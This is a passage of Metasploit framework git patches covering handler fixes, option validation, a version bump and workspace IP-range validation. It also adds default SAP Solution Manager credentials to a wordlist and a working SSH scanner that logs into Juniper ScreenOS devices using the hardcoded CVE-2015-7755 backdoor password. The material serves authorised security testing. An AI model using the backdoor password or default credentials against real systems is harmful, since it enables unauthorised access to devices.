b/lib/msf/ui/console/module_command_dispatcher.rb index a78b6f8107..12fe0fcae2 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb @@ -122,8 +122,6 @@ module ModuleCommandDispatcher # Checks to see if a target is vulnerable. # def cmd_check(*args) - defanged? - ip_range_arg = args.shift || mod.datastore['RHOSTS'] || framework.datastore['RHOSTS'] || '' opt = Msf::OptAddressRange.new('RHOSTS') @@ -176,7 +174,7 @@ module ModuleCommandDispatcher def check_simple(instance=nil) unless instance - instance = mod + instance = mod end rhost = instance.datastore['RHOST'] From 6523600952934fcf80f4397fce820de69577efdf Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 29 Mar 2016 09:35:53 +1000 Subject: [PATCH 622/686] Add a rescue to catch method missing for stage_payload This allows us to provide a friendlier message to users when they are using a stageless listener with a staged payload. --- lib/msf/core/handler/reverse_http.rb | 47 +++++++++++++++------------- 1 file changed, 26 insertions(+), 21 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index e4fe6a4c6e..a094a3b3f9 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -331,29 +331,34 @@ protected resp['Content-Type'] = 'application/octet-stream' - # generate the stage, but pass in the existing UUID and connection id so that - # we don't get new ones generated. - blob = obj.stage_payload( - uuid: uuid, - uri: conn_id, - lhost: uri.host, - lport: uri.port - ) + begin + # generate the stage, but pass in the existing UUID and connection id so that + # we don't get new ones generated. + blob = obj.stage_payload( + uuid: uuid, + uri: conn_id, + lhost: uri.host, + lport: uri.port + ) - resp.body = encode_stage(blob) + resp.body = encode_stage(blob) - # Short-circuit the payload's handle_connection processing for create_session - create_session(cli, { - :passive_dispatcher => obj.service, - :conn_id => conn_id, - :url => url, - :expiration => datastore['SessionExpirationTimeout'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :retry_total => datastore['SessionRetryTotal'].to_i, - :retry_wait => datastore['SessionRetryWait'].to_i, - :ssl => ssl?, - :payload_uuid => uuid - }) + # Short-circuit the payload's handle_connection processing for create_session + create_session(cli, { + :passive_dispatcher => obj.service, + :conn_id => conn_id, + :url => url, + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :retry_total => datastore['SessionRetryTotal'].to_i, + :retry_wait => datastore['SessionRetryWait'].to_i, + :ssl => ssl?, + :payload_uuid => uuid + }) + rescue NoMethodError + print_error("Staging failed. This can occur when stageless listeners are used with staged payloads.") + return + end when :connect print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...") From e25525b4a71b008eeb58201e728568145547795d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 28 Mar 2016 23:03:17 -0500 Subject: [PATCH 623/686] avoid validating file-based datastore options on assignment file:/ strings are special with some datastore options, causing them to read a file rather than emitting the exact string. This causes a couple of problems. 1. the valid? check needs to be special on assignment, since normalization really means normalizing the path, not playing with the value as we would do for other types 2. there are races or simply out-of-order assignments when running commands like 'services -p 80 -R', where the datastore option is assigned before the file is actually written. This is the 'easy' fix of disabling assignment validation (which we didn't have before anyway) for types that can expect a file:/ prefix. --- lib/msf/core/data_store.rb | 8 +++++--- lib/msf/core/opt_address_range.rb | 4 ++++ lib/msf/core/opt_base.rb | 7 +++++++ lib/msf/core/opt_path.rb | 4 ++++ lib/msf/core/opt_raw.rb | 4 ++++ lib/msf/core/opt_string.rb | 4 ++++ 6 files changed, 28 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index eeecd6ea38..81a3e2ed55 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -29,10 +29,12 @@ class DataStore < Hash opt = @options[k] unless opt.nil? - unless opt.valid?(v) - raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'#{['', ', try harder'].sample}"]) + if opt.validate_on_assignment? + unless opt.valid?(v) + raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'"]) + end + v = opt.normalize(v) end - v = opt.normalize(v) end super(k,v) diff --git a/lib/msf/core/opt_address_range.rb b/lib/msf/core/opt_address_range.rb index 50c1653971..13dbe4bcd1 100644 --- a/lib/msf/core/opt_address_range.rb +++ b/lib/msf/core/opt_address_range.rb @@ -12,6 +12,10 @@ class OptAddressRange < OptBase return 'addressrange' end + def validate_on_assignment? + false + end + def normalize(value) return nil unless value.kind_of?(String) if (value =~ /^file:(.*)/) diff --git a/lib/msf/core/opt_base.rb b/lib/msf/core/opt_base.rb index 566f53703f..b332788bc5 100644 --- a/lib/msf/core/opt_base.rb +++ b/lib/msf/core/opt_base.rb @@ -75,6 +75,13 @@ module Msf return (type == in_type) end + # + # Returns true if this option can be validated on assignment + # + def validate_on_assignment? + true + end + # # If it's required and the value is nil or empty, then it's not valid. # diff --git a/lib/msf/core/opt_path.rb b/lib/msf/core/opt_path.rb index 6a40d48fef..23a23a1671 100644 --- a/lib/msf/core/opt_path.rb +++ b/lib/msf/core/opt_path.rb @@ -12,6 +12,10 @@ class OptPath < OptBase return 'path' end + def validate_on_assignment? + false + end + # Generally, 'value' should be a file that exists. def valid?(value) return false if empty_required_value?(value) diff --git a/lib/msf/core/opt_raw.rb b/lib/msf/core/opt_raw.rb index 1ecc37f290..b144334165 100644 --- a/lib/msf/core/opt_raw.rb +++ b/lib/msf/core/opt_raw.rb @@ -12,6 +12,10 @@ class OptRaw < OptBase return 'raw' end + def validate_on_assignment? + false + end + def normalize(value) if (value.to_s =~ /^file:(.*)/) path = $1 diff --git a/lib/msf/core/opt_string.rb b/lib/msf/core/opt_string.rb index 8b7499a940..459ac08cc6 100644 --- a/lib/msf/core/opt_string.rb +++ b/lib/msf/core/opt_string.rb @@ -12,6 +12,10 @@ class OptString < OptBase return 'string' end + def validate_on_assignment? + false + end + def normalize(value) if (value.to_s =~ /^file:(.*)/) path = $1 From 4f84c5a3b7798ca4c29be95b7805f833f0a75653 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Tue, 29 Mar 2016 15:53:15 +0100 Subject: [PATCH 624/686] Add additional SOLMAN default creds --- data/wordlists/sap_default.txt | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index 3f7a5321c3..752eb03d2b 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -16,4 +16,12 @@ SAPJSF ch4ngeme SAPR3 SAP CTB_ADMIN sap123 XMI_DEMO sap123 - +IDEADM admin +SMD_ADMIN init1234 +SMD_BI_RFC init1234 +SMD_RFC init1234 +SOLMAN_ADMIN init1234 +SOLMAN_BTC init1234 +SAPSUPPORT init1234 +CONTENTSERV init1234 +SMD_AGT init1234 From faaaf6b7653dbc52ebcb9307e95f75827f7f633b Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 29 Mar 2016 13:40:51 -0500 Subject: [PATCH 625/686] MS10-58 Call super in #set_sane_defaults for caidao login scanner MS10-58 --- lib/metasploit/framework/login_scanner/caidao.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/metasploit/framework/login_scanner/caidao.rb b/lib/metasploit/framework/login_scanner/caidao.rb index 28eb0a7c7b..1907f96a4a 100644 --- a/lib/metasploit/framework/login_scanner/caidao.rb +++ b/lib/metasploit/framework/login_scanner/caidao.rb @@ -43,6 +43,7 @@ module Metasploit def set_sane_defaults self.method = "POST" if self.method.nil? + super end # Actually doing the login. Called by #attempt_login From b41ac10fe8f540a6159735d2c2a0747c8f9283b5 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Tue, 29 Mar 2016 12:43:20 -0700 Subject: [PATCH 626/686] Bump version of framework to 4.11.20 --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 955826a1fe..2c79340509 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.19) + metasploit-framework (4.11.20) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index caea85e2fe..93ae4be7e4 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.19" + VERSION = "4.11.20" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 3b0170e87d24730e89ab0695c7dc4b5f8b83e9d5 Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Tue, 29 Mar 2016 17:56:22 -0500 Subject: [PATCH 627/686] Import workspace IP validation from Mdm This allows us to actually test the validations, since the code calls out to Rex::Socket::RangeWalker. MS-902 --- app/concerns/mdm/workspace/boundary_range.rb | 60 ++++++++++++++++ spec/models/mdm/workspace_spec.rb | 73 ++++++++++++++++++++ 2 files changed, 133 insertions(+) create mode 100644 app/concerns/mdm/workspace/boundary_range.rb create mode 100644 spec/models/mdm/workspace_spec.rb diff --git a/app/concerns/mdm/workspace/boundary_range.rb b/app/concerns/mdm/workspace/boundary_range.rb new file mode 100644 index 0000000000..ee68038362 --- /dev/null +++ b/app/concerns/mdm/workspace/boundary_range.rb @@ -0,0 +1,60 @@ +module Mdm::Workspace::BoundaryRange + extend ActiveSupport::Concern + + included do + # + # Validations + # + + validate :boundary_must_be_ip_range + + # + # Instance Methods + # + + # If {#limit_to_network} is disabled, this will always return `true`. + # Otherwise, return `true` only if all of the given IPs are within the + # project {#boundary boundaries}. + + # + # @param ips [String] IP range(s) + # @return [true] if actions on ips are allowed. + # @return [false] if actions are not allowed on ips. + def allow_actions_on?(ips) + return true unless limit_to_network + return true unless boundary + return true if boundary.empty? + boundaries = Shellwords.split(boundary) + return true if boundaries.empty? # It's okay if there is no boundary range after all + given_range = Rex::Socket::RangeWalker.new(ips) + return false unless given_range # Can't do things to nonexistant IPs + allowed = false + boundaries.each do |boundary_range| + ok_range = Rex::Socket::RangeWalker.new(boundary) + allowed = true if ok_range.include_range? given_range + end + return allowed + end + + # Validates that {#boundary} is {#valid_ip_or_range? a valid IP address or + # IP address range}. Due to this not being tested before it was moved here + # from Mdm, the default workspace does not validate. We therefore don't + # validate boundaries of workspaces that don't use them. + # + # @return [void] + def boundary_must_be_ip_range + errors.add(:boundary, "must be a valid IP range") unless !limit_to_network || valid_ip_or_range?(boundary) + end + + private + + # Returns whether `string` is a valid IP address or IP address range. + # + # @return [true] if valid IP address or IP address range. + # @return [false] otherwise. + def valid_ip_or_range?(string) + range = Rex::Socket::RangeWalker.new(string) + range && range.ranges && range.ranges.any? + end + end +end diff --git a/spec/models/mdm/workspace_spec.rb b/spec/models/mdm/workspace_spec.rb new file mode 100644 index 0000000000..dafbf541d4 --- /dev/null +++ b/spec/models/mdm/workspace_spec.rb @@ -0,0 +1,73 @@ +RSpec.describe Mdm::Workspace, type: :model do + subject(:workspace) do + Mdm::Workspace.new + end + + context 'validations' do + context 'boundary' do + let(:boundary) do + nil + end + + let(:error) do + 'must be a valid IP range' + end + + context 'when the workspace is limited to a network' do + before(:example) do + workspace.boundary = boundary + workspace.limit_to_network = true + workspace.valid? + end + + it 'should validate using #valid_ip_or_range?' do + expect(workspace).to receive(:valid_ip_or_range?).with(boundary).and_return(false) + + workspace.valid? + end + + context 'with valid IP' do + let(:boundary) do + '192.168.0.1' + end + + it 'should not record an error' do + expect(workspace.errors[:boundary]).not_to include(error) + end + end + + context 'with valid range' do + let(:boundary) do + '192.168.0.1/24' + end + + it 'should not record an error' do + expect(workspace.errors[:boundary]).not_to include(error) + end + end + + context 'with invalid IP or range' do + let(:boundary) do + '192.168' + end + + it 'should record error that boundary must be a valid IP range' do + expect(workspace).not_to be_valid + expect(workspace.errors[:boundary]).to include(error) + end + end + end + + context 'when the workspace is not network limited' do + before(:example) do + workspace.boundary = boundary + workspace.valid? + end + + it 'should not care about the value of the boundary' do + expect(workspace.errors[:boundary]).not_to include(error) + end + end + end + end +end From d35b5e9c2aaca3d65c138b6ec9d13b3f5181ddd9 Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 29 Mar 2016 21:20:12 -0400 Subject: [PATCH 628/686] First add of CVE-2015-7755 --- .../auxiliary/scanner/ssh/juniper_backdoor.rb | 80 +++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 modules/auxiliary/scanner/ssh/juniper_backdoor.rb diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb new file mode 100644 index 0000000000..700aa586d8 --- /dev/null +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -0,0 +1,80 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + + require 'net/ssh' + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + # include Msf::Auxiliary::CommandShell + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Juniper SSH Backdoor Scanner', + 'Description' => %q{ + This module scans for the Juniper SSH backdoor. Also valid on telnet. + A username is required, and hte password is <<< %s(un='%s') = %u + }, + 'Author' => [ + 'hdm', # discovery + 'h00die ' # Module + ], + 'References' => [ + ['CVE', '2015-7755'], + ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'], + ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713&cat=SIRT_1&actp=LIST'] + ], + 'DisclosureDate' => 'Dec 20 2015', + 'License' => MSF_LICENSE + )) + + register_options([ + Opt::RPORT(22) + ]) + + register_advanced_options([ + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + ]) + end + + def run_host(ip) + ssh_opts = { + port: rport, + auth_methods: ['password', 'keyboard-interactive'], + password: '<<< %s(un=\'%s\') = %u' + } + + ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do + Net::SSH.start( + ip, + 'admin', + ssh_opts + ) + end + rescue Net::SSH::Exception => e + vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") + return + end + + if ssh + print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un=\'%s\') = %u") + report_vuln( + :host => ip, + :name => self.name, + :refs => self.references, + :info => ssh.transport.server_version.version + ) + end + end + + def rport + datastore['RPORT'] + end + +end From 7fc2c860e9a895017bb02bdc143f310f7f920a2b Mon Sep 17 00:00:00 2001 From: h00die Date: Tue, 29 Mar 2016 21:26:36 -0400 Subject: [PATCH 629/686] remove comment --- modules/auxiliary/scanner/ssh/juniper_backdoor.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index 700aa586d8..958ad21cfb 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -8,7 +8,6 @@ class MetasploitModule < Msf::Auxiliary require 'net/ssh' include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - # include Msf::Auxiliary::CommandShell def initialize(info = {}) super(update_info(info, From bc48ebd43bcaaa54b10225a91f26b2de799fea1b Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 29 Mar 2016 23:21:01 -0500 Subject: [PATCH 630/686] Use patch_finder for msu_finder --- Gemfile.lock | 2 + metasploit-framework.gemspec | 2 + spec/tools/msu_finder_spec.rb | 640 --------------------------- tools/exploit/msu_finder.rb | 799 +++------------------------------- 4 files changed, 72 insertions(+), 1371 deletions(-) delete mode 100644 spec/tools/msu_finder_spec.rb diff --git a/Gemfile.lock b/Gemfile.lock index 2c79340509..874f9e4fbc 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -21,6 +21,7 @@ PATH octokit openssl-ccm (= 1.2.1) packetfu (= 1.1.11) + patch_finder (>= 1.0.2) pcaprub pg (>= 0.11) railties @@ -157,6 +158,7 @@ GEM packetfu (1.1.11) network_interface (~> 0.0) pcaprub (~> 0.12) + patch_finder (1.0.2) pcaprub (0.12.1) pg (0.18.4) pg_array_parser (0.0.9) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 94a9dee3f2..d84be8c93a 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -92,6 +92,8 @@ Gem::Specification.new do |spec| # Needed for documentation generation spec.add_runtime_dependency 'octokit' spec.add_runtime_dependency 'redcarpet' + # Needed for Microsoft patch finding tool (msu_finder) + spec.add_runtime_dependency 'patch_finder', '>= 1.0.2' # rb-readline doesn't work with Ruby Installer due to error with Fiddle: # NoMethodError undefined method `dlopen' for Fiddle:Module diff --git a/spec/tools/msu_finder_spec.rb b/spec/tools/msu_finder_spec.rb deleted file mode 100644 index 6725b7696b..0000000000 --- a/spec/tools/msu_finder_spec.rb +++ /dev/null @@ -1,640 +0,0 @@ -load Metasploit::Framework.root.join('tools/exploit/msu_finder.rb').to_path - -require 'nokogiri' -require 'uri' -require 'spec_helper' - -RSpec.describe MicrosoftPatchFinder do - - before(:example) do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(Rex::Proto::Http::Response.new) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - end - - let(:technet) do - MicrosoftPatchFinder::SiteInfo::TECHNET - end - - let(:microsoft) do - MicrosoftPatchFinder::SiteInfo::MICROSOFT - end - - let(:googleapis) do - MicrosoftPatchFinder::SiteInfo::GOOGLEAPIS - end - - describe MicrosoftPatchFinder::SiteInfo do - context 'Constants' do - context 'TECHNET' do - it 'returns 157.56.148.23 as the IP' do - expect(technet[:ip]).to eq('157.56.148.23') - end - - it 'returns technet.microsoft.com as the vhost' do - expect(technet[:vhost]).to eq('technet.microsoft.com') - end - end - - context 'MICROSOFT' do - it 'returns 104.72.230.162 as the IP' do - expect(microsoft[:ip]).to eq('104.72.230.162') - end - - it 'returns www.microsoft.com as the vhost' do - expect(microsoft[:vhost]).to eq('www.microsoft.com') - end - end - - context 'GOOGLEAPIS' do - it 'returns 74.125.28.95 as the IP' do - expect(googleapis[:ip]).to eq('74.125.28.95') - end - - it 'returns www.googleapis.com as the vhost' do - expect(googleapis[:vhost]).to eq('www.googleapis.com') - end - end - end - end - - describe MicrosoftPatchFinder::Helper do - subject(:object_helper) do - mod = Object.new - mod.extend MicrosoftPatchFinder::Helper - mod - end - - describe '#print_debug' do - it 'prints a [DEBUG] message' do - output = get_stderr { object_helper.print_debug } - expect(output).to include('[DEBUG]') - end - end - - describe '#print_status' do - it 'prints a [*] message' do - output = get_stderr { object_helper.print_status } - expect(output).to include('[*]') - end - end - - describe '#print_error' do - it 'prints an [ERROR] message' do - output = get_stderr { object_helper.print_error } - expect(output).to include('[ERROR]') - end - end - - describe '#print_line' do - it 'prints a regular message' do - msg = 'TEST' - output = get_stdout { object_helper.print_line(msg) } - expect(output).to eq("#{msg}\n") - end - end - - describe '#send_http_request' do - it 'returns a Rex::Proto::Http::Response object' do - allow(object_helper).to receive(:print_debug) - res = object_helper.send_http_request(MicrosoftPatchFinder::SiteInfo::TECHNET) - expect(res).to be_kind_of(Rex::Proto::Http::Response) - end - end - - end - - describe MicrosoftPatchFinder::PatchLinkCollector do - - let(:ms15_100_html) do - %Q| - -
    -
    -

    -
    - Affected Software -
    - - -
    fake link
    -
    -
    -

    -
    -
    - - | - end - - let(:ms07_029_html) do - %Q| - -
    - - | - end - - let(:ms03_039_html) do - %Q| - -
    -
    -
    -

    - Download locations -

    - -
    -
    -
    - - | - end - - let(:ms07_030_html) do - %Q| - -
    -

    - Affected Software -

    - - - - - | - end - - subject(:patch_link_collector) do - MicrosoftPatchFinder::PatchLinkCollector.new - end - - before(:example) do - allow(patch_link_collector).to receive(:print_debug) - end - - describe '#download_advisory' do - it 'returns a Rex::Proto::Http::Response object' do - res = patch_link_collector.download_advisory('ms15-100') - expect(res).to be_kind_of(Rex::Proto::Http::Response) - end - end - - describe '#get_appropriate_pattern' do - - it 'returns a pattern for ms15-100' do - expected_pattern = '//div[@id="mainBody"]//div//div[@class="sectionblock"]//table//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms15_100_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms07-029' do - expected_pattern = '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms07_029_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms03-039' do - expected_pattern = '//div[@id="mainBody"]//div//div[@class="sectionblock"]//ul//li//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms03_039_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms07-030' do - expected_pattern = '//div[@id="mainBody"]//table//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms07_030_html)) - expect(p).to eq(expected_pattern) - end - end - - describe '#get_details_aspx' do - let(:details_aspx) do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(ms15_100_html) - res - end - - it 'returns an URI object to a details aspx' do - links = patch_link_collector.get_details_aspx(details_aspx) - expected_uri = 'https://www.microsoft.com/downloads/details.aspx?familyid=1' - expect(links.length).to eq(1) - expect(links.first).to be_kind_of(URI) - expect(links.first.to_s).to eq(expected_uri) - end - end - - describe '#follow_redirect' do - let(:expected_header) do - { 'Location' => 'http://example.com/' } - end - - let(:http_res) do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:headers).and_return(expected_header) - res - end - - it 'goes to a location based on the Location HTTP header' do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(http_res) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - - expect(patch_link_collector.follow_redirect(technet, http_res).headers).to eq(expected_header) - end - end - - describe '#get_download_page' do - it 'returns a Rex::Proto::Http::Response object' do - uri = URI('http://www.example.com/') - expect(patch_link_collector.get_download_page(uri)).to be_kind_of(Rex::Proto::Http::Response) - end - end - - describe '#get_download_links' do - let(:confirm_aspx) do - %Q| - - Download - - | - end - - let(:expected_link) do - 'https://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' - end - - let(:download_html_res) do - Rex::Proto::Http::Response.new.tap { |response| - allow(response).to receive(:body).and_return( - %Q| - - Click here - - | - ) - } - end - - it 'returns an array of links' do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(download_html_res) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - - expect(patch_link_collector.get_download_links(confirm_aspx).first).to eq(expected_link) - end - end - - describe '#has_advisory?' do - it 'returns true if the page is found' do - res = Rex::Proto::Http::Response.new - expect(patch_link_collector.has_advisory?(res)).to be_truthy - end - - it 'returns false if the page is not found' do - html = %Q| - - We are sorry. The page you requested cannot be found - - | - - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(html) - expect(patch_link_collector.has_advisory?(res)).to be_falsey - end - end - - describe '#is_valid_msb?' do - let(:good_msb) do - 'MS15-100' - end - - let(:bad_msb) do - 'MS15-01' - end - - it 'returns true if the MSB format is correct' do - expect(patch_link_collector.is_valid_msb?(good_msb)).to be_truthy - end - - it 'returns false if the MSB format is incorrect' do - expect(patch_link_collector.is_valid_msb?(bad_msb)).to be_falsey - end - - end - - end - - describe MicrosoftPatchFinder::TechnetMsbSearch do - - subject(:technet_msb_search) do - MicrosoftPatchFinder::TechnetMsbSearch.new - end - - before(:example) do - allow_any_instance_of(MicrosoftPatchFinder::TechnetMsbSearch).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::TechnetMsbSearch).to receive(:send_http_request) { |info_obj, info_opts, opts| - case opts['uri'] - when /\/en\-us\/security\/bulletin\/dn602597\.aspx/ - html = %Q| - - | - when /\/security\/bulletin\/services\/GetBulletins/ - html = %Q|{ - "l":1, - "b":[ - { - "d":"9/8/2015", - "Id":"MS15-100", - "KB":"3087918", - "Title":"Vulnerability in Windows Media Center Could Allow Remote Code Execution", - "Rating":"Important" - } - ] - } - | - else - html = '' - end - - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(html) - res - } - end - - let(:ie10) do - 'Windows Internet Explorer 10' - end - - let(:ie10_id) do - 10401 - end - - describe '#find_msb_numbers' do - it 'returns an array of found MSB numbers' do - msb = technet_msb_search.find_msb_numbers(ie10) - expect(msb).to be_kind_of(Array) - expect(msb.first).to eq('ms15-100') - end - end - - describe '#search' do - it 'returns search results in JSON format' do - results = technet_msb_search.search(ie10) - expect(results).to be_kind_of(Hash) - expect(results['b'].first['Id']).to eq('MS15-100') - end - end - - describe '#search_by_product_ids' do - it 'returns an array of found MSB numbers' do - results = technet_msb_search.search_by_product_ids([ie10_id]) - expect(results).to be_kind_of(Array) - expect(results.first).to eq('ms15-100') - end - end - - describe '#search_by_keyword' do - it 'returns an array of found MSB numbers' do - results = technet_msb_search.search_by_keyword('ms15-100') - expect(results).to be_kind_of(Array) - expect(results.first).to eq('ms15-100') - end - end - - describe '#get_product_dropdown_list' do - it 'returns an array of products' do - results = technet_msb_search.get_product_dropdown_list - expect(results).to be_kind_of(Array) - expect(results.first).to be_kind_of(Hash) - expected_hash = {:option_value=>"10175", :option_text=>"Active Directory"} - expect(results.first).to eq(expected_hash) - end - end - - end - - describe MicrosoftPatchFinder::GoogleMsbSearch do - - subject(:google_msb_search) do - MicrosoftPatchFinder::GoogleMsbSearch.new - end - - let(:json_data) do - %Q|{ - "kind": "customsearch#search", - "url": { - "type": "application/json", - "template": "" - }, - "queries": { - "request": [ - { - "title": "Google Custom Search - internet", - "totalResults": "1", - "searchTerms": "internet", - "count": 10, - "startIndex": 1, - "inputEncoding": "utf8", - "outputEncoding": "utf8", - "safe": "off", - "cx": "" - } - ] - }, - "context": { - "title": "Technet.microsoft" - }, - "searchInformation": { - "searchTime": 0.413407, - "formattedSearchTime": "0.41", - "totalResults": "1", - "formattedTotalResults": "1" - }, - "items": [ - { - "kind": "customsearch#result", - "title": "Microsoft Security Bulletin MS15-093 - Critical", - "htmlTitle": "Microsoft Security Bulletin MS15-093 - Critical", - "link": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "displayLink": "technet.microsoft.com", - "snippet": "", - "htmlSnippet": "", - "cacheId": "2xDJB6zqL_sJ", - "formattedUrl": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "htmlFormattedUrl": "https://technet.microsoft.com/en-us/library/security/ms15-093.aspx", - "pagemap": { - "metatags": [ - { - "search.mshkeyworda": "ms15-093", - "search.mshattr.assetid": "ms15-093", - "search.mshattr.docset": "bulletin", - "search.mshattr.sarticletype": "bulletin", - "search.mshattr.sarticleid": "MS15-093", - "search.mshattr.sarticletitle": "Security Update for Internet Explorer", - "search.mshattr.sarticledate": "2015-08-20", - "search.mshattr.sarticleseverity": "Critical", - "search.mshattr.sarticleversion": "1.1", - "search.mshattr.sarticlerevisionnote": "", - "search.mshattr.sarticleseosummary": "", - "search.mshattr.skbnumber": "3088903", - "search.mshattr.prefix": "MSRC", - "search.mshattr.topictype": "kbOrient", - "search.mshattr.preferredlib": "/library/security", - "search.mshattr.preferredsitename": "TechNet", - "search.mshattr.docsettitle": "MSRC Document", - "search.mshattr.docsetroot": "Mt404691", - "search.save": "history", - "search.microsoft.help.id": "ms15-093", - "search.description": "", - "search.mscategory": "dn567670", - "search.mscategoryv": "dn567670Security10", - "search.tocnodeid": "mt404691", - "mshkeyworda": "ms15-093", - "mshattr": "AssetID:ms15-093", - "save": "history", - "microsoft.help.id": "ms15-093" - } - ] - } - } - ] -} - | - end - - before(:example) do - allow_any_instance_of(MicrosoftPatchFinder::GoogleMsbSearch).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::GoogleMsbSearch).to receive(:send_http_request) { |info_obj, info_opts, opts| - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(json_data) - res - } - end - - let(:expected_msb) do - 'ms15-093' - end - - describe '#find_msb_numbers' do - it 'returns an array of msb numbers' do - results = google_msb_search.find_msb_numbers(expected_msb) - expect(results).to be_kind_of(Array) - expect(results).to eq([expected_msb]) - end - end - - describe '#search' do - it 'returns a hash (json data)' do - results = google_msb_search.search(starting_index: 1) - expect(results).to be_kind_of(Hash) - end - end - - describe '#parse_results' do - it 'returns a hash (json data)' do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(json_data) - - results = google_msb_search.parse_results(res) - expect(results).to be_kind_of(Hash) - end - end - - describe '#get_total_results' do - it 'returns a fixnum' do - total = google_msb_search.get_total_results(JSON.parse(json_data)) - expect(total).to be_kind_of(Fixnum) - end - end - - describe '#get_next_index' do - it 'returns a fixnum' do - i = google_msb_search.get_next_index(JSON.parse(json_data)) - expect(i).to 